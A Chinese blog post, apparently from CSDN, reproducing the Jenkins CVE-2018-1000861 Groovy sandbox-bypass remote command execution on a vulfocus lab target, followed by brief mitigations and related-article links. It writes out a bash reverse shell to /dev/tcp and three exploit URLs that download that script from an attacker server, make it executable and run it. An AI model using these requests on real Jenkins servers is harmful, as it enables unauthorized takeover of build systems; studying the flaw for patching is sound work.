[漏洞复现]vulfocus/jenkins-cve_2018_1000861-命令执行

最新推荐文章于 2023-09-21 15:52:56 发布
最新推荐文章于 2023-09-21 15:52:56 发布
阅读量234 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: jenkins
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45751902/article/details/128015633
版权

文章目录

一、简介

Jenkins 是常见的CI/CD服务器, 最常见的就是爆破弱口令然后使用groovy执行命令

Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。
通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令

二、影响版本

Jenkins 2.138

三、漏洞复现

先在自己的服务器上创建一个文件,内容为

bash -i >& /dev/tcp/ip/port 0>&1

然后打开下面的url

http://123.58.224.8:17513/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl+-o+/tmp/1.sh+http://自己服务器ip/1.txt".execute()}}

给下载的文件执行权限

http://123.58.224.8:17513/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"chmod+777+/tmp/1.sh".execute()}}

在自己的服务器上监听端口,然后执行下面的命令

http://123.58.224.8:17513/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"bash+/tmp/1.sh".execute()}}

在这里插入图片描述

四、修复

1.设置强口令

2.尽量不要开放到公网

3.限制来源IP

4.升级到最新版

空白行
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hello_Jenkins-master_jenkins_
09-30
These simple exercises are designed to introduce you to Jenkins and continuous integration. The original exercise was written as an exercise for California State University
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 523
Jenkins远程命令执行漏洞CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是
Jenkins远程命令执行漏洞
m0_48520508的博客
12-23 453
0x00简介 Jenkins自动化部署可以解决集成、测试、部署等重复性的工作,工具集成的效率明显高于人工操作;并且持续集成可以更早的获取代码变更的信息,从而更早的进入测试阶段,更早的发现问题,这样解决问题的成本就会显著下降:持续集成缩短了从开发、集成、测试、部署各个环节的时间,从而也就缩短了中间出现的等待时间;持续集成也意味着开发、集成、测试、部署得以持续。 0x01漏洞概述 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者
漏洞复现----6、Jenkins远程命令执行漏洞CVE-2018-1000861
七天
11-25 4291
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
Jenkins远程命令执行漏洞CVE-2018-1000861
EC_Carrot的博客
07-05 372
漏洞复现 只需要访问以下网址即可执行命令: http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript ?sandbox=true &value=public class x { public x(){ "touch /tmp/success".execute(
jenkins2.289.1版本远程命令执行漏洞
山兔的博客
11-13 2864
在网络安全行业中,有一种方法可以识别、定义和编目公开披露的漏洞。这种类型的标识称为CVE,代表常见漏洞和披露。分析后,为每个漏洞分配一个严重等级,称为 CVSS 分数,范围从 0 到 10,其中 0 表示信息,10 表示严重。这些分数取决于几个因素,其中一些是 CIA 的危害级别(机密性、完整性、可用性)、攻击复杂程度、攻击面的大小等。在计算机安全中,任意代码执行 (ACE) 是攻击者在目标计算机或目标进程中执行任意命令或代码的能力。[…]旨在利用此类漏洞的程序称为任意代码执行漏洞
Jenkins-Monitoring_Dashboard:自定义 Jenkins 监控仪表板
06-24
Jenkins-Monitoring_Dashboard
jenkins-centos_dockerfile_and_intelligent_webserver_deployment
02-15
jenkins-centos_dockerfile_and_intelligent_webserver_deployment 要求: 码头工人 吉特 github帐号 设置方法: 下载 。 将帮助创建预装有jenkins的docker映像,当我们使用该docker映像启动容器时,它将自动...
treinamentos-2073-jenkins-projeto_inicial:treinamentos
03-14
treinamentos-2073-jenkins-projeto_inicial treinamentos
jenkins漏洞复现
Shanfenglan's blog
11-30 1525
文章目录什么是jenkinsJenkins远程命令执行漏洞CVE-2018-1000861)参考文章 什么是jenkins 实现了CI/CD的产品。jenkins会从git或者svn上拉代码然后在配置所指向的环境中进行编译并上线。 Jenkins的思想就是自动化部署,“自动化”的具体体现在:当我们向版本库(SVN)提交新的代码后,应用服务器(Tomcat)就会自动从我们的SVN上拉去新的war包,然后重新部署,用户或测试人员看到的就是最新的应用程序。 Jenkins远程命令执行漏洞CVE-2018-10
漏洞复现-Jenkins
aming小老弟
10-03 514
渗透
[漏洞复现] jenkins 远程代码执行CVE-2019-100300)
qq_45751902的博客
11-24 1785
拥有Overall/Read 权限的用户可以绕过沙盒保护,在jenkins可以执行任意代码。此漏洞需要一个账号密码和一个存在的job。Jenkins的pipeline主要是通过一个配置文件或者job里面的pipeline脚本配置来设定每个job的步骤. pipeline定义了几乎所有要用到的流程, 比如执行shell, 存档, 生成测试报告, 发布报告等。
Jenkins RCE 漏洞复现CVE-2017-1000353、CVE-2018-1000861
最新发布
oiadkt的博客
09-21 1401
Jenkins 是软件测试过程中常用的一种持续构建的工具,Jenkins RCE 漏洞触发方式大致分为两种,一种使用 Jenkins CLI 触发,而另一种触发方式为 HTTP 请求触发。这里复现CVE-2017-1000353 与 CVE-2018-1000861 就是两种触发方式的代表。
Jenkins远程代码执行漏洞
chaojixiaojingang
09-07 1525
1.资产查找 Fofa:title=”jenkins” 2.漏洞描述: Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台。Jenkins存在远程代码执行漏洞漏洞成因是Jenkins平台提供了一个界面给使用者检查自己的Pipeline脚本,使用GroovyClassLoader.parseClass()来检查Pipeline脚本语法的正确性,攻击者构造特定的代码造成远程代码执行,攻击者通过该漏洞可获取服务器完全...
漏洞分析|死磕Jenkins漏洞回显与利用效果
m0_46699477的博客
06-28 1219
本文以 Jenkins 反序列化漏洞作为优化案例,分享我们的解决漏洞问题的方式。
漏洞复现Jenkins远程命令执行漏洞CVE-2018-1000861
weixin_43486390的博客
12-21 1909
0x01 漏洞介绍 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。 0x02 影响版本
yang.li_test2_01 create successful Traceback (most recent call last): File "/IP/sip_dv/yang.li/test0612/proc_tools/Jenkins_script/jenkins_create_flow_v2.py", line 34, in <module> create_jenkins_jobs(server, configFileName) File "/IP/sip_dv/yang.li/test0612/proc_tools/Jenkins_script/jenkins_operation/curd_operation.py", line 58, in create_jenkins_jobs server.build_job(jobConfig.jobName) File "/tools/python/3.10.2/lib/python3.10/site-packages/jenkins/__init__.py", line 1370, in build_job response = self.jenkins_request(requests.Request( File "/tools/python/3.10.2/lib/python3.10/site-packages/jenkins/__init__.py", line 578, in jenkins_request return self._response_handler( File "/tools/python/3.10.2/lib/python3.10/site-packages/jenkins/__init__.py", line 539, in _response_handler response.raise_for_status() File "/tools/python/3.10.2/lib/python3.10/site-packages/requests/models.py", line 1021, in raise_for_status raise HTTPError(http_error_msg, response=self) requests.exceptions.HTTPError: 409 Client Error: Conflict for url: http://ci.enflame.cn/job/yang.li_test2_01/build
06-13
根据你的提示信息,我看到你在使用 Python 的 Jenkins 库进行 Jenkins Job 的创建,并且在执行 `server.build_job(jobConfig.jobName)` 时出现了 HTTP 409 Conflict 错误。这个错误通常表示你正在尝试创建一个已经存在的 Job。建议你检查一下你的 Jenkins 中是否已经存在名为 `yang.li_test2_01` 的 Job,如果是的话,可以尝试修改 Job 名称或者使用 Jenkins 库提供的其他方法进行 Job 的更新。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值